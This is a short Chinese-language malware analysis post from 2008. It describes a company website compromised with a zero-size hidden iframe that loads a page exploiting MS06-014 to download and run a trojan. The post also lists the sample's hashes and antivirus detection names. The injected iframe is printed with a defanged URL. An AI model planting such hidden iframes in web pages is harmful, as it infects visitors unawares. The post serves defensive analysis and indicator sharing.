X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
endurer 原创
2008-06-01 第1版
网站包含代码:
/---
<iframe src="hxxp://he*i*dian*.go2.i**cp*c*n.com/wo/tzd.htm" name="zhu" width="0"height="0" frameborder="0">
---/
hxxp://he*i*dian*.go2.i**cp*c*n.com/wo/tzd.htm 是个以 VBScript 为脚本的ASP网页,输出VBScript脚本。
该脚本利用 MS06-014漏洞下载 hxxp://he*i*dian*.go2.i**cp*c*n.com/ok.exe,通过rundll32.exe来启动。
文件说明符 : D:/test/ok.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-29 11:28:47
修改时间 : 2008-5-29 11:28:48
访问时间 : 2008-5-29 11:29:0
大小 : 76417 字节 74.641 KB
MD5 : 8ddfa0c57a93aad29e9cd48992954596
SHA1: 5DCB4D0671898464E59FFB829D64F66359339910
CRC32: 12070808
卡巴斯基报为 Trojan-Downloader.Win32.Losabel.dy,瑞星报为 Trojan.DL.Win32.Mnless.zcd